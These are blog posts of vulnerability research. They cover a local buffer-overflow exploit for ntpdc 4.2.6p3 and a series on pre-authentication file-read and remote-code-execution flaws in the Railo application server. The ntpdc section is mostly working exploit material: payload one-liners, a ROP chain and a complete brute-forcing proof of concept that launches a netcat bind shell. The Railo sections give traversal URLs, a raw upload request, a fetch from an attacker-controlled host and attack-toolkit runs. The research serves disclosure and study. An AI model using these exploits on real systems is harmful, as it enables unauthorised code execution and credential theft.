EIP: 0x806ad3d --> 0xcccccccc
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x806ad38:   int    0xa9
   0x806ad3a:   push   es
   0x806ad3b:   or     ah,cl
=> 0x806ad3d:   int3   
   0x806ad3e:   int3   
   0x806ad3f:   int3   
   0x806ad40:   int3   
   0x806ad41:   int3
[------------------------------------stack-------------------------------------]
0000| 0xbffff3ec --> 0xb7fa1d8d (<el_gets+45>:  cmp    eax,0x1)
0004| 0xbffff3f0 --> 0x806a9cd --> 0x0 
0008| 0xbffff3f4 --> 0x0 
0012| 0xbffff3f8 --> 0x8069108 --> 0xb7d7a4d0 (push   ebx)
0016| 0xbffff3fc --> 0x0 
0020| 0xbffff400 --> 0xb7c677f4 --> 0x1cce 
0024| 0xbffff404 --> 0x807b9d0 ('A' <repeats 200 times>...)
0028| 0xbffff408 --> 0x807d688 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0x0806ad3d in ?? ()
gdb-peda$ 

Er, what? It appears to be executing code in BSS! Recall the output of paxtest/checksec/hardening-check from earlier, NX was clearly enabled. This took me a few hours to figure out, but it ultimately came down to Debian not distributing x86 images with PAE, or Physical Address Extension. PAE is a kernel feature that allows 32-bit CPU’s to access physical page tables and doubling each entry in the page table and page directory. This third level of paging and increased entry size is required for NX on x86 architectures because NX adds a single ‘dont execute’ bit to the page table. You can read more about PAE here, and the original NX patch here.

This flag can be tested for with a simple grep of /proc/cpuinfo; on a fresh install of Debian 7, a grep for PAE will turn up empty, but on something with support, such as Ubuntu, you’ll get the flag back.

Because I had come this far already, I figured I might as well get the exploit working. At this point it was simple, anyway:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\x90"*4 + "\x68\xec\xf7\xff\xbf\x68\x70\xe2\xc8\xb7\x68\x30\xac\xc9\xb7\xc3"' > input2.file 
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < input.file 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<�AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAͩ����h����hp�ȷh0�ɷ�' unknown
[New process 4396]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
process 4396 is executing new program: /bin/dash
[New process 4397]
process 4397 is executing new program: /bin/nc.traditional

This uses a simple system payload with hard-coded addresses, because at this point it’s an old-school, CTF-style exploit. And it works. With this trivial PoC working, I decided to check another box I had to verify this is a common distribution method. An Ubuntu VM said otherwise:

1
2
3
4
5
6
7
$ uname -a
Linux bryan-VirtualBox 3.2.0-74-generic #109-Ubuntu SMP Tue Dec 9 16:47:54 UTC 2014 i686 i686 i386 GNU/Linux
$ ./checksec.sh --file /usr/bin/ntpdc
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   /usr/bin/ntpdc
$ cat /proc/sys/kernel/randomize_va_space
2

Quite a different story. We need to bypass full RELRO (no GOT overwrites), PIE+ASLR, NX, SSP, and ASCII armor. In our current state, things are looking pretty grim. As an aside, it’s important to remember that because this is a local exploit, the attacker is assumed to have limited control over the system. Ergo, an attacker may inspect and modify the system in the same manner a limited user could. This becomes important with a few techniques we’re going to use moving forward.

Our first priority is stack pivoting; we won’t be able to ROP to victory without control over the stack. There are a few options for this, but the easiest option is likely going to be an ADD ESP, ? gadget. The problem with this being that we need to have some sort of control over the stack or be able to modify ESP somewhere into BSS that we control. Looking at the output of ropgadget, we’ve got 36 options, almost all of which are of the form ADD ESP, ?.

After looking through the list, I determined that none of the values led to control over the stack; in fact, nothing I injected landed on the stack. I did note, however, the following:

1
2
3
4
5
6
7
8
9
10
11
12
gdb-peda$ x/6i 0x800143e0
   0x800143e0: add    esp,0x256c
   0x800143e6: pop    ebx
   0x800143e7: pop    esi
   0x800143e8: pop    edi
   0x800143e9: pop    ebp
   0x800143ea: ret 
gdb-peda$ x/30s $esp+0x256c
0xbffff3a4:  "-1420310755.557158-104120677"
0xbffff3c1:  "WINDOWID=69206020"
0xbffff3d3:  "GNOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM"
0xbffff3fd:  "GTK_MODULES=canberra-gtk-module:canberra-gtk-module"

These are environmental variables passed into the application and located on the program stack. Using the ROP gadget ADD ESP, 0x256c, followed by a series of register POPs, we could land here. Controlling this is easy with the help of LD_PRELOAD, a neat trick documented by Dan Rosenberg in 2010. By exporting LD_PRELOAD, we can control uninitialized data located on the stack, as follows:

1
2
3
4
5
6
7
8
9
$ export LD_PRELOAD=`python -c 'print "A"*10000'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[..snip..]
gdb-peda$ x/10wx $esp+0x256c
0xbfffedc8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffedd8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffede8: 0x41414141  0x41414141
gdb-peda$ 

Using some pattern_create/offset magic, we can find the offset in our LD_PRELOAD string and take control over EIP and the stack:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ export LD_PRELOAD=`python -c 'print "A"*8490 + "AAAA" + "BBBB"'`
$ python -c "print 'A'*485 + '\xe0\x43\x01\x80' + 'A'*79 + '\x8d\x67\x02\x80' + 'B'*600" > input.file
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0x41414141 ('AAAA')
ECX: 0x13560 
EDX: 0x42424242 ('BBBB')
ESI: 0x41414141 ('AAAA')
EDI: 0x41414141 ('AAAA')
EBP: 0x41414141 ('AAAA')
ESP: 0xbffff3bc ("BBBB")
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xbffff3bc ("BBBB")
0004| 0xbffff3c0 --> 0x4e495700 ('')
0008| 0xbffff3c4 ("DOWID=69206020")
0012| 0xbffff3c8 ("D=69206020")
0016| 0xbffff3cc ("206020")
0020| 0xbffff3d0 --> 0x47003032 ('20')
0024| 0xbffff3d4 ("NOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM")
0028| 0xbffff3d8 ("_KEYRING_CONTROL=/tmp/keyring-iBX3uM")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()

This gives us EIP, control over the stack, and control over a decent number of registers; however, the LD_PRELOAD trick is extremely sensitive to stack shifting which represents a pretty big problem for exploit portability. For now, I’m going to forget about it; chances are we could brute force the offset, if necessary, or simply invoke the application with env -i.

From here, we need to figure out a ROP payload. The easiest payload I can think of is a simple ret2libc. Unfortunately, ASCII armor null bytes all of them:

1
2
3
4
5
6
7
8
gdb-peda$ vmmap

0x00327000 0x004cb000 r-xp /lib/i386-linux-gnu/libc-2.15.so
0x004cb000 0x004cd000 r--p /lib/i386-linux-gnu/libc-2.15.so
0x004cd000 0x004ce000 rw-p /lib/i386-linux-gnu/libc-2.15.so
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x366060 <system>
gdb-peda$ 

One idea I had was to simply construct the address in memory, then call it. Using ROPgadget, I hunted for ADD/SUB instructions that modified any registers we controlled. Eventually, I discovered this gem:

1
2
0x800138f2: add edi, esi; ret 0;
0x80022073: call edi

Using the above, we could pop controlled, non-null values into EDI/ESI, that when added equaled 0x366060 <system>. Many values will work, but I chose 0xeeffffff + 0x11366061:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
EAX: 0x6c61636f ('ocal')
EBX: 0x41414141 ('AAAA')
ECX: 0x12f00 
EDX: 0x42424242 ('BBBB')
ESI: 0xeeffffff 
EDI: 0x11366061 
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefb8 --> 0x800138f2 (add    edi,esi)
EIP: 0x800143ea (ret)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x800143e7: pop    esi
   0x800143e8: pop    edi
   0x800143e9: pop    ebp
=> 0x800143ea: ret    
   0x800143eb: nop
   0x800143ec: lea    esi,[esi+eiz*1+0x0]
   0x800143f0: mov    DWORD PTR [esp],ebp
   0x800143f3: call   0x80018d20
[------------------------------------stack-------------------------------------]
0000| 0xbfffefb8 --> 0x800138f2 (add    edi,esi)
0004| 0xbfffefbc --> 0x80022073 --> 0xd7ff 
0008| 0xbfffefc0 ('C' <repeats 200 times>...)
0012| 0xbfffefc4 ('C' <repeats 200 times>...)
0016| 0xbfffefc8 ('C' <repeats 200 times>...)
0020| 0xbfffefcc ('C' <repeats 200 times>...)
0024| 0xbfffefd0 ('C' <repeats 200 times>...)
0028| 0xbfffefd4 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x800143ea in ?? ()

As shown above, we’ve got our two values in EDI/ESI and are returning to our ADD EDI, ESI gadget. Once this completes, we return to our CALL EDI gadget, which will jump into system:

1
2
3
4
5
6
7
EDI: 0x366060 (<system>:   sub    esp,0x1c)
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefc0 --> 0xbffff60d ("/bin/nc -lp 5544 -e /bin/sh")
EIP: 0x80022073 --> 0xd7ff
EFLAGS: 0x217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0x80022073: call   edi

Recall the format of a ret2libc: [system() address | exit() | shell command]; therefore, we need to stick a bogus exit address (in my case, junk) as well as the address of a command. Also remember, however, that CALL EDI is essentially a macro for PUSH EIP+2 ; JMP EDI. This means that our stack will be tainted with the address @ EIP+2. Thanks to this, we don’t really need to add an exit address, as one will be added for us. There are, unfortunately, no JMP EDI gadgets in the binary, so we’re stuck with a messy exit.

This culminates in:

1
2
3
4
5
6
7
8
9
10
$ export LD_PRELOAD=`python -c 'print "A"*8472 + "\xff\xff\xff\xee" + "\x61\x60\x36\x11" + "AAAA" + "\xf2\x38\x01\x80" + "\x73\x20\x02\x80" + "\x0d\xf6\xff\xbf" + "C"*1492'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[snip all the LD_PRELOAD crap]
[New process 31184]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
process 31184 is executing new program: /bin/dash
[New process 31185]
process 31185 is executing new program: /bin/nc.traditional

Success! Though this is a very dirty hack, and makes no claim of portability, it works. As noted previously, we can brute force the image base and stack offsets, though we can also execute the binary with an empty environment and no stack tampering with env -i, giving us a much higher chance of hitting our mark.

Overall, this was quite a bit of fun. Although ASLR/PIE still poses an issue, this is a local bug that brute forcing and a little investigation can’t take care of. NX/RELRO/Canary/SSP/ASCII Armor have all been successfully neutralized. I hacked up a PoC that should work on Ubuntu boxes as configured, but it brute forces offsets. Test runs show it can take up to 2 hours to successfully pop a box. Full code can be found below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from os import system, environ
from struct import pack
import sys

#
# ntpdc 4.2.6p3 bof
# @dronesec
# tested on x86 Ubuntu 12.04.5 LTS
#

IMAGE_BASE = 0x80000000
LD_INITIAL_OFFSET = 8900
LD_TAIL_OFFSET = 1400

sploit = "\x41" * 485        # junk 
sploit += pack("<I", IMAGE_BASE + 0x000143e0) # eip
sploit += "\x41" * 79        # junk 
sploit += pack("<I", IMAGE_BASE + 0x0002678d) # location -0x14/-0x318 from shellcode

ld_pl = ""
ld_pl += pack("<I", 0xeeffffff) # ESI
ld_pl += pack("<I", 0x11366061) # EDI
ld_pl += pack("<I", 0x41414141) # EBP
ld_pl += pack("<I", IMAGE_BASE + 0x000138f2) # ADD EDI, ESI; RET
ld_pl += pack("<I", IMAGE_BASE + 0x00022073) # CALL EDI
ld_pl += pack("<I", 0xbffff60d) # payload addr based on empty env; probably wrong

environ["EGG"] = "/bin/nc -lp 5544 -e /bin/sh"

for idx in xrange(200):

    for inc in xrange(200):

        ld_pl = ld_pl + "\x41" * (LD_INITIAL_OFFSET + idx)
        ld_pl += "\x43" * (LD_INITIAL_OFFSET + inc)

        environ["LD_PRELOAD"] = ld_pl
        system("echo %s | ntpdc 2>&1" % sploit)

railo security - part four - pre-auth remote code execution

27 August 2014 at 21:00

Part one – intro
Part two – post-auth rce
Part three – pre-auth password retrieval
Part four – pre-auth remote code execution

This post concludes our deep dive into the Railo application server by detailing not only one, but two pre-auth remote code execution vulnerabilities. If you’ve skipped the first three parts of this blog post to get to the juicy stuff, I don’t blame you, but I do recommend going back and reading them; there’s some important information and details back there. In this post, we’ll be documenting both vulnerabilities from start to finish, along with some demonstrations and notes on clusterd’s implementation on one of these.

The first RCE vulnerability affects versions 4.1 and 4.2.x of Railo, 4.2.1 being the latest release. Our vulnerability begins with the file thumbnail.cfm, which Railo uses to store admin thumbnails as static content on the server. As previously noted, Railo relies on authentication measures via the cfadmin tag, and thus none of the cfm files actually contain authentication routines themselves.

thumbnail.cfm first generates a hash of the image along with it’s width and height:

1
2
3
<cfset url.img=trim(url.img)>
<cfset id=hash(url.img&"-"&url.width&"-"&url.height)>
<cfset mimetypes={png:'png',gif:'gif',jpg:'jpeg'}>

Once it’s got a hash, it checks if the file exists, and if not, attempts to read and write it down:

1
2
3
4
5
6
7
8
9
10
11
12
13
<cffile action="readbinary" file="#url.img#" variable="data">
<cfimage action="read" source="#data#" name="img">

<!--- shrink images if needed --->
<cfif img.height GT url.height or img.width GT url.width>
    <cfif img.height GT url.height >
        <cfimage action="resize" source="#img#" height="#url.height#" name="img">
    </cfif>
    <cfif img.width GT url.width>
        <cfimage action="resize" source="#img#" width="#url.width#" name="img">
    </cfif>
    <cfset data=toBinary(img)>
</cfif>

The cffile tag is used to read the raw image and then cast it via the cfimage tag. The wonderful thing about cffile is that we can provide URLs that it will arbitrarily retrieve. So, our URL can be this:

1
192.168.1.219:8888/railo-context/admin/thumbnail.cfm?img=http://192.168.1.97:8000/my_image.png&width=5000&height=50000

And Railo will go and fetch the image and cast it. Note that if a height and width are not provided it will attempt to resize it; we don’t want this, and thus we provide large width and height values. This file is written out to /railo/temp/admin-ext-thumbnails/[HASH].[EXTENSION].

We’ve now successfully written a file onto the remote system, and need a way to retrieve it. The temp folder is not accessible from the web root, so we need some sort of LFI to fetch it. Enter jsloader.cfc.

jsloader.cfc is a Railo component used to fetch and load Javascript files. In this file is a CF tag called get, which accepts a single argument lib, which the tag will read and return. We can use this to fetch arbitrary Javascript files on the system and load them onto the page. Note that it MUST be a Javascript file, as the extension is hard-coded into the file and null bytes don’t work here, like they would in PHP. Here’s the relevant code:

1
2
3
4
5
6
7
8
<cfset var filePath = expandPath('js/#arguments.lib#.js')/>
    <cfset var local = {result=""} /><cfcontent type="text/javascript">
        <cfsavecontent variable="local.result">
            <cfif fileExists(filePath)>
                <cfinclude template="js/#arguments.lib#.js"/>
            </cfif>
        </cfsavecontent>
    <cfreturn local.result />

Let’s tie all this together. Using thumbnail.cfm, we can write well-formed images to the file system, and using the jsloader.cfc file, we can read arbitrary Javascript. Recall how log injection works with PHP; we can inject PHP tags into arbitrary files so long as the file is loaded by PHP, and parsed accordingly. We can fill a file full of junk, but if the parser has its way a single <?phpinfo();?> will be discovered and executed; the CFML engine works the same way.

Our attack becomes much more clear: we generate a well-formed PNG file, embed CFML code into the image (metadata), set the extension to .js, and write it via thumbnail.cfm. We then retrieve the file via jsloader.cfc and, because we’re loading it with a CFM file, it will be parsed and executed. Let’s check this out:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer jsload

        clusterd/0.3.1 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-06-15 03:39PM] Started at 2014-06-15 03:39PM
 [2014-06-15 03:39PM] Servers' OS hinted at windows
 [2014-06-15 03:39PM] Fingerprinting host '192.168.1.219'
 [2014-06-15 03:39PM] Server hinted at 'railo'
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Server...
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Server Administrator...
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Web Administrator...
 [2014-06-15 03:39PM] Matched 2 fingerprints for service railo
 [2014-06-15 03:39PM]   Railo Server Administrator (version 4.1)
 [2014-06-15 03:39PM]   Railo Web Administrator (version 4.1)
 [2014-06-15 03:39PM] Fingerprinting completed.
 [2014-06-15 03:39PM] This deployer (jsload_lfi) requires an external listening port (8000).  Continue? [Y/n] > 
 [2014-06-15 03:39PM] Preparing to deploy cmd.cfml...
 [2014-06-15 03:40PM] Waiting for remote server to download file [5s]]
 [2014-06-15 03:40PM] Invoking stager and deploying payload...
 [2014-06-15 03:40PM] Waiting for remote server to download file [7s]]
 [2014-06-15 03:40PM] cmd.cfml deployed at /railo-context/cmd.cfml
 [2014-06-15 03:40PM] Finished at 2014-06-15 03:40PM

A couple things to note; as you may notice, the module currently requires the Railo server to connect back twice. Once is for the image with embedded CFML, and the second for the payload. We embed only a stager in the image that then connects back for the actual payload.

Sadly, the LFI was unknowingly killed in 4.2.1 with the following fix to jsloader.cfc:

1
2
3
4
<cfif arguments.lib CT "..">
    <cfheader statuscode="400">
    <cfreturn "// 400 - Bad Request">
</cfif>

The arguments.lib variable contains our controllable path, but it kills our ability to traverse out. Unfortunately, we can’t substitute the .. with unicode or utf-16 due to the way Jetty and Java are configured, by default. This file is pretty much useless to us now, unless we can write into the folder that jsloader.cfc reads from; then we don’t need to traverse out at all.

We can still pop this on Express installs, due to the Jetty LFI discussed in part 3. By simply traversing into the extensions folder, we can load up the Javascript file and execute our shell. Railo installs still prove elusive.

buuuuuuuuuuuuuuuuuuuuuuuuut

Recall the img.cfm LFI from part 3; by tip-toeing back into the admin-ext-thumbnails folder, we can summon our vulnerable image and execute whatever coldfusion we shove into it. This proves to be an even better choice than jsloader.cfc, as we don’t need to traverse as far. This bug only affects versions 4.1 – 4.2.1, as thumbnail.cfm wasn’t added until 4.1. CVE-2014-5468 has been assigned to this issue.

The second RCE vulnerability is a bit easier and has a larger attack vector, spanning all versions of Railo. As previously noted, Railo does not do per page/URL authentication, but rather enforces it when making changes via the <cfadmin> tag. Due to this, any pages doing naughty things without checking with the tag may be exploitable, as previously seen. Another such file is overview.uploadNewLangFile.cfm:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<cfif structKeyExists(form, "newLangFile")>
    <cftry>
        <cffile action="UPLOAD" filefield="form.newLangFile" destination="#expandPath('resources/language/')#" nameconflict="ERROR">
        <cfcatch>
            <cfthrow message="#stText.overview.langAlreadyExists#">
        </cfcatch>
    </cftry>
    <cfset sFile = expandPath("resources/language/" & cffile.serverfile)>
    <cffile action="READ" file="#sFile#" variable="sContent">
    <cftry>
        <cfset sXML     = XMLParse(sContent)>
        <cfset sLang    = sXML.language.XMLAttributes.label>
        <cfset stInLang = GetFromXMLNode(sXML.XMLRoot.XMLChildren)>
        <cfcatch>
            <cfthrow message="#stText.overview.ErrorWhileReadingLangFile#">
        </cfcatch>
    </cftry>

I mean, this might as well be an upload form to write arbitrary files. It’s stupid simple to get arbitrary data written to the system:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /railo-context/admin/overview.uploadNewLangFile.cfm HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/railo-context/admin/server.cfm
Connection: keep-alive
Content-Type: multipart/form-data; boundary=AaB03x
Content-Length: 140

--AaB03x
Content-Disposition: form-data; name="newLangFile"; filename="xxxxxxxxx.lang"
Content-Type: text/plain

thisisatest
--AaB03x--

The tricky bit is where it’s written to; Railo uses a compression system that dynamically generates compressed versions of the web server, contained within railo-context.ra. A mirror of these can be found under the following:

1
[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress

The compressed data is then obfuscated behind two more folders, both MD5s. In my example, it becomes:

1
[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress\88d817d1b3c2c6d65e50308ef88e579c\0bdbf4d66d61a71378f032ce338258f2

So we cannot simply traverse into this path, as the hashes change every single time a file is added, removed, or modified. I’ll walk the logic used to generate these, but as a precusor, we aren’t going to figure these out without some other fashionable info disclosure bug.

The hashes are calculated in railo-java/railo-core/src/railo/commons/io/res/type/compress/Compress.java:

1
2
3
4
5
6
7
8
9
10
11
12
temp=temp.getRealResource("compress");                
temp=temp.getRealResource(MD5.getDigestAsString(cid+"-"+ffile.getAbsolutePath()));
if(!temp.exists())temp.createDirectory(true);
}
catch(Throwable t){}
}

    if(temp!=null) {
        String name=Caster.toString(actLastMod)+":"+Caster.toString(ffile.length());
        name=MD5.getDigestAsString(name,name);
        root=temp.getRealResource(name);
        if(actLastMod>0 && root.exists()) return;

The first hash is then cid + "-" + ffile.getAbsolutePath(), where cid is the randomly generated ID found in the id file (see part two) and ffile.getAbsolutePath() is the full path to the classes resource. This is doable if we have the XXE, but 4.1+ is inaccessible.

The second hash is actLastMode + ":" + ffile.length(), where actLastMode is the last modified time of the file and ffile.length() is the obvious file length. Again, this is likely not brute forcable without a serious infoleak vulnerability. Hosts <= 4.0 are exploitable, as we can list files with the XXE via the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
bryan@debdev:~/tools/clusterd$ python http_test_xxe.py 
88d817d1b3c2c6d65e50308ef88e579c

[SNIP - in which we modify the path to include ^]

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py
0bdbf4d66d61a71378f032ce338258f2

[SNIP - in which we modify the path to include ^]

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py
admin
admin_cfc$cf.class
admin_cfm$cf.class
application_cfc$cf.class
application_cfm$cf.class
component_cfc$cf.class
component_dump_cfm450$cf.class
doc
doc_cfm$cf.class
form_cfm$cf.class
gateway
graph_cfm$cf.class
jquery_blockui_js_cfm1012$cf.class
jquery_js_cfm322$cf.class
META-INF
railo_applet_cfm270$cf.class
res
templates
wddx_cfm$cf.class

http_test_xxe.py is just a small hack I wrote to exploit the XXE, in which we eventually obtain both valid hashes. So we can exploit this in versions <= 4.0 Express. Later versions, as far as I can find, have no discernible way of obtaining full RCE without another infoleak or resorting to a slow, loud, painful death of brute forcing two MD5 hashes.

The first RCE is currently available in clusterd dev, and a PR is being made to Metasploit thanks to @BrandonPrry. Hopefully it can be merged shortly.

As we conclude our Railo analysis, lets quickly recap the vulnerabilities discovered during this audit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Version 4.2:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express) (Up to version 4.2.0)
Version 4.1:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
Version 4.0:
    - Pre-authentication LFI via XXE (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
Version 3.x:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication LFI via XXE (Install/Express)
    - Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Express)

This does not include the random XSS bugs or post-authentication issues. At the end of it all, this appears to be a framework with great ideas, but desperately in need of code TLC. Driving forward with a checklist of features may look nice on a README page, but the desolate wasteland of code left behind can be a scary thing. Hopefully the Railo guys take note and spend some serious time evaluating and improving existing code. The bugs found during this series have been disclosed to the developers; here’s to hoping they follow through.

railo security - part three - pre-authentication LFI

23 August 2014 at 21:00

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication LFI
Part four – pre-authentication rce

This post continues our four part Railo security analysis with three pre-authentication LFI vulnerabilities. These allow anonymous users access to retrieve the administrative plaintext password and login to the server’s administrative interfaces. If you’re unfamiliar with Railo, I recommend at the very least reading part one of this series. The most significant LFI discussed has been implemented as auxiliary modules in clusterd, though they’re pretty trivial to exploit on their own.

We’ll kick this portion off by introducing a pre-authentication LFI vulnerability that affects all versions of Railo Express; if you’re unfamiliar with the Express install, it’s really just a self-contained, no-installation-necessary package that harnesses Jetty to host the service. The flaw actually has nothing to do with Railo itself, but rather in this packaged web server, Jetty. CVE-2007-6672 addresses this issue, but it appears that the Railo folks have not bothered to update this. Via the browser, we can pull the config file, complete with the admin hash, with http://[host]:8888/railo-context/admin/..\..\railo-web.xml.cfm.

A quick run of this in clusterd on Railo 4.0:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.0 --rl-pw

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-15 06:25PM] Started at 2014-05-15 06:25PM
 [2014-05-15 06:25PM] Servers' OS hinted at windows
 [2014-05-15 06:25PM] Fingerprinting host '192.168.1.219'
 [2014-05-15 06:25PM] Server hinted at 'railo'
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Server...
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Server Administrator...
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Web Administrator...
 [2014-05-15 06:25PM] Matched 3 fingerprints for service railo
 [2014-05-15 06:25PM]   Railo Server (version 4.0)
 [2014-05-15 06:25PM]   Railo Server Administrator (version 4.0)
 [2014-05-15 06:25PM]   Railo Web Administrator (version 4.0)
 [2014-05-15 06:25PM] Fingerprinting completed.
 [2014-05-15 06:25PM] Attempting to pull password...
 [2014-05-15 06:25PM] Fetched encrypted password, decrypting...
 [2014-05-15 06:25PM] Decrypted password: default
 [2014-05-15 06:25PM] Finished at 2014-05-15 06:25PM

and on the latest release of Railo, 4.2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.2 --rl-pw

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-15 06:28PM] Started at 2014-05-15 06:28PM
 [2014-05-15 06:28PM] Servers' OS hinted at windows
 [2014-05-15 06:28PM] Fingerprinting host '192.168.1.219'
 [2014-05-15 06:28PM] Server hinted at 'railo'
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Server...
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Server Administrator...
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Web Administrator...
 [2014-05-15 06:28PM] Matched 3 fingerprints for service railo
 [2014-05-15 06:28PM]   Railo Server (version 4.2)
 [2014-05-15 06:28PM]   Railo Server Administrator (version 4.2)
 [2014-05-15 06:28PM]   Railo Web Administrator (version 4.2)
 [2014-05-15 06:28PM] Fingerprinting completed.
 [2014-05-15 06:28PM] Attempting to pull password...
 [2014-05-15 06:28PM] Fetched password hash: d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b
 [2014-05-15 06:28PM] Finished at 2014-05-15 06:28PM

